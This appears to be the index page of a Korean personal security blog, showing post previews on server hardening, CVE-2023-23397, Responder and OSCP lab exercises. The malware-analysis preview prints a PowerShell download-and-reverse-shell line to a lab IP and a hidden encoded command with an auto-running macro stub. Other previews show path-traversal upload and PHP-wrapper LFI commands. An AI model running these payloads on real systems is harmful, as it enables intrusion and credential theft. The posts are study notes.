๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

์ „์ฒด ๊ธ€743

์•„ํŒŒ์น˜ - ํด๋ผ์šฐ๋“œ ํ”Œ๋ ˆ์–ด ์•„์ดํ”ผ๋งŒ ์ ‘๊ทผ ํ—ˆ์šฉ(.htaccess) nano /var/www/html/.htaccess deny from allallow from 173.245.48.0/20allow from 103.21.244.0/22allow from 103.22.200.0/22allow from 103.31.4.0/22allow from 141.101.64.0/18allow from 108.162.192.0/18allow from 190.93.240.0/20allow from 188.114.96.0/20allow from 197.234.240.0/22allow from 198.41.128.0/17allow from 162.158.0.0/15allow from 104.16.0.0/13allow from 104.24.0.0/14allow from 172.64.0.0/1.. 2025. 8. 27.
๋ฆฌ๋ˆ…์Šค - ssh ๋กœ๊ทธ์ธ ํšŸ์ˆ˜ ์ดˆ๊ณผ IP ์ฐจ๋‹จ(fail2ban) fail2ban ํŒจํ‚ค์ง€ ์„ค์น˜sudo apt updatesudo apt install fail2ban -y ์„ค์ • ํŒŒ์ผ ์ˆ˜์ •(โ€ปjail.conf๋Š” ๋ฐฑ์—…์šฉ, ์‹ค์ œ ์„ค์ •์€ jail.local)sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local fail2ban ์„ค์ • sudo nano /etc/fail2ban/jail.local [sshd]enabled = trueport = sshfilter = sshdlogpath = /var/log/auth.logmaxretry = 3bantime = 48hfindtime = 10m maxretry: ํ—ˆ์šฉํ•  ์ตœ๋Œ€ ๋กœ๊ทธ์ธ ์‹คํŒจ ํšŸ์ˆ˜bantime: ์ฐจ๋‹จ ์‹œ๊ฐ„(100 = 100์ดˆ, 10m = 10๋ถ„, 1h = 1์‹œ๊ฐ„)findtime.. 2025. 8. 20.
ํด๋ผ์šฐ๋“œ ํ”Œ๋ ˆ์–ด ์„ค์ • ํ›„ 522 ์—๋Ÿฌ ๋ฐœ์ƒ ์›์ธ ์›น ์„œ๋ฒ„์— SSL ์ธ์ฆ์„ ์ง€์›ํ•˜์ง€ ์•Š๋Š” ๊ฒฝ์šฐ(HTTP/80๋งŒ ์šด์šฉ ์ค‘์ธ ๊ฒฝ์šฐ) ์›น ์„œ๋ฒ„์™€ ํด๋ผ์šฐ๋“œ ํ”Œ๋ ˆ์–ด ์„œ๋กœ๊ฐ„ ์˜ค๋ฅ˜๊ฐ€ ์ƒ๊ธฐ๊ฒŒ ๋จ ํ•ด๊ฒฐ) SSL/TLS ์•”ํ˜ธํ™” > ํ˜„์žฌ ์•”ํ˜ธํ™” ๋ชจ๋“œ๊ฐ€ "๊ฐ€๋ณ€"์ด์–ด์•ผ ํ•จ 2025. 8. 18.
Flipper Zero - ํ‚ค์  (keygen.co) https://keygen.co/ keygenkeygen generates working, high-quality 3D-printable models of keys based on given parameters. Select a key type to get started. Please wait... keygen generates working, high-quality 3D-printable models of keys based on given parameters. To generate a key,keygen.co 2025. 8. 17.
java.security.cert.certpathvalidatorexception trust anchor for certification ์—๋Ÿฌ ISRG Root X1 ํ˜น์€ ISRG Root X2 .pem ํŒŒ์ผ ์„ค์น˜https://letsencrypt.org/certificates/ Chains of TrustThis page describes all of the current and relevant historical Certification Authorities operated by Let’s Encrypt. Note that a CA is most correctly thought of as a key and a name: any given CA may be represented by multiple certificates which all contailetsencrypt.org์ถœ์ฒ˜: https://github.com/TeamNewPipe/Ne.. 2025. 8. 13.
๋ชจ๋“  ์ธ์ฝ”๋”ฉ ๋””์ฝ”๋”ฉ ๋ฌธ์ž ํ™•์ธ ์‚ฌ์ดํŠธ(dencode.com) https://dencode.com/ DenCode | Encoding & Decoding Online ToolsEncoding and Decoding site. e.g. HTML Escape / URL Encoding / Base64 / MD5 / SHA-1 / CRC32 / and many other String, Number, DateTime, Color, Hash formats!dencode.com 2025. 8. 5.
๋ธ”๋ž™๋ฒ ๋ฆฌ - bar ์„ค์น˜ ๊ด€๋ จ ๋งํฌ BAR ํŒŒ์ผ ์„ค์น˜ ํ”„๋กœ๊ทธ๋žจhttps://github.com/xsacha/Sachesi GitHub - xsacha/Sachesi: Firmware, extractor, searcher and installer for Blackberry 10Firmware, extractor, searcher and installer for Blackberry 10 - xsacha/Sachesigithub.com ํ„ฐ๋ฏธ๋„ ์•ฑ(term-48) ์•„์นด์ด๋ธŒ ์ฃผ์†Œhttps://archive.org/details/term-48_bb10 2025. 7. 30.
์ทจ์•ฝ์  ๋ถ„์„ - CVE-2023-23397 CVE-2023-23397 ์ทจ์•ฝ์  ์ •๋ณดCVE-2023-23397๋Š” Microsoft Windows ์ „์šฉ Outlook์— ์•ฝ์†์„ ์•Œ๋ ค์ฃผ๋Š” ‘๋ฏธ๋ฆฌ ์•Œ๋ฆผ’ ๊ธฐ๋Šฅ์— ์žฌ์ƒํ•  ์‚ฌ์šด๋“œ ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ์˜ค๊ธฐ ์œ„ํ•ด์„œ ๊ณต๊ฒฉ์ž์˜ SMB ์„œ๋ฒ„๋กœ ์ธ์ฆํ•˜๋Š” ๊ณผ์ •์— NTLM ์ž๊ฒฉ ์ฆ๋ช…์„ ํƒˆ์ทจ๋˜๋Š” ๊ถŒํ•œ ์ƒ์Šน ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.ํ•ด๋‹น ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์ด ์ด๋ฃจ์–ด์ ธ ๋” ํฐ ํ”ผํ•ด๊ฐ€ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์„ ์ •๋„๋กœ ์œ„ํ—˜๋„๋Š” ๋‹ค์†Œ ๋†’์„ ๊ฒƒ์œผ๋กœ ์˜ˆ์ƒ๋ฉ๋‹ˆ๋‹ค.์กฐ์น˜ ๋ฐฉ์•ˆ์œผ๋กœ Outlook์„ Build 16130.20306 ์ด์ƒ์œผ๋กœ ์—…๋ฐ์ดํŠธ๊ฐ€ ํ•„์š”ํ•˜๋ฉฐ, SMB ์„œ๋น„์Šค๋ฅผ ์ด์šฉํ•˜์ง€ ์•Š์„ ๊ฒฝ์šฐ์—๋Š” ํ•ด๋‹น ์„œ๋น„์Šค๋ฅผ ๋น„ํ™œ์„ฑํ™” ํ•˜๊ฑฐ๋‚˜ SMB TCP/445 ํฌํŠธ ์•„์›ƒ๋ฐ”์šด๋“œ๋ฅผ ์ฐจ๋‹จํ•ฉ๋‹ˆ๋‹ค.CVE Number CVE-2023-23397CVSS Score9.8severity(์‹ฌ๊ฐ๋„).. 2025. 7. 27.
์ทจ์•ฝ์  ๋ถ„์„ - NTLM ํฌ๋ฆฌ๋ด์…œ ํŒจํ‚ท ์Šค๋‹ˆํผ (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com ์‚ฌ์šฉ ์˜ˆ์‹œ... 2025. 7. 27.
์•…์„ฑ์ฝ”๋“œ ๋ถ„์„ - ๋งคํฌ๋กœ ๋ฌธ์„œ ์•…์„ฑ ํŒŒ์ผ IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')์ฒญํฌํ™”(๋ฌธ์ž์—ด์ด ๋„ˆ๋ฌด ๊ธธ๋ฉด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒ) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26.
OSCP - 9.3.2. Using Non-Executable Files ํŒŒ์ผ ์—…๋กœ๋“œ ์‹œ ์‹คํ–‰์ด ๋ถˆ๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ(e.g. ์‹คํ–‰ ๊ถŒํ•œ์ด ์—†๋Š” ์—…๋กœ๋“œ ํด๋”)์— ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ์ทจ์•ฝ์  ๋ถ„์„ ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ณธ๋‹ค. ์šฐ์„  ํŒŒ์ผ ์—…๋กœ๋“œ ์‹œ filename์— ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์กฐ์ž‘ํ•˜์—ฌ ../../../../../../../test.txt๋ฅผ ๋„ฃ์–ด ์„œ๋ฒ„๋กœ ์ „๋‹ฌํ•œ ๊ฒฝ์šฐ ์„œ๋ฒ„ ์ธก์ด ์ •์ƒ ์‘๋‹ต์„ ํ•œ ๊ฒฝ์šฐ ์ทจ์•ฝ ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ์„ ์ˆ˜ ์žˆ๋‹ค. ํŠนํžˆ ์—ฌ๊ธฐ์— ๋ฃจํŠธ(/) ๊ฒฝ๋กœ์ž„์—๋„ ์ •์ƒ ์—…๋กœ๋“œ ๋œ ๊ฒƒ์ด๋ผ๋ฉด root์˜ ํ™ˆ๋””๋ ‰ํ„ฐ๋ฆฌ๋„ ์ง์ ‘ ์ ‘๊ทผ์ด ๊ฐ€๋Šฅํ•จ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. kali@kali:~$ ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileupEnter passphras.. 2025. 7. 22.
OSCP - 9.2.2. PHP Wrappers admin.php ํŒŒ์ผ ๋‚ด์šฉkali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance. ๋‹ค์Œ๊ณผ ๊ฐ™์ด LFI๊ฐ€ ๋ฐœ์ƒํ•˜๋Š” ๊ฒฝ์šฐ(์ž…๋ ฅ ๊ฒ€์ฆ ์—†์ด ๋ฐ”๋กœ include ์‹คํ–‰ => include $_GET["page"];)PHP Wrappers์— ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ๋‹ค. admin.php ํŽ˜์ด์ง€ base64 ์ธ์ฝ”๋”ฉ(php://filter)kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resourc.. 2025. 7. 21.
728x90